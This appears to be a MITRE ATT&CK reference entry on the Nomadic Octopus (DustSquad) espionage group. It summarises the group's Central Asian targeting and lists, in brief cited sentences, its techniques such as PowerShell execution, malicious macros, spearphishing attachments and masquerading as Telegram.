Nomadic Octopus

Nomadic Octopus is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. Nomadic Octopus has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.[1][2][3]

ID: G0133
Associated Groups: DustSquad
Version: 1.0
Created: 24 August 2021
Last Modified: 02 September 2022

Associated Group Descriptions

Name Description
DustSquad

[1][2][4]

Techniques Used

Domain ID Name Use
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Nomadic Octopus has used PowerShell for execution.[3]

.003 Command and Scripting Interpreter: Windows Command Shell

Nomadic Octopus used cmd.exe /c within a malicious macro.[3]

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Nomadic Octopus executed PowerShell in a hidden window.[3]

Enterprise T1105 Ingress Tool Transfer

Nomadic Octopus has used malicious macros to download additional files to the victim's machine.[3]

Enterprise T1036 Masquerading

Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface.[2]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Nomadic Octopus has targeted victims with spearphishing emails containing malicious attachments.[1][3]

Enterprise T1204 .002 User Execution: Malicious File

Nomadic Octopus as attempted to lure victims into clicking on malicious attachments within spearphishing emails.[2][3]

Software

References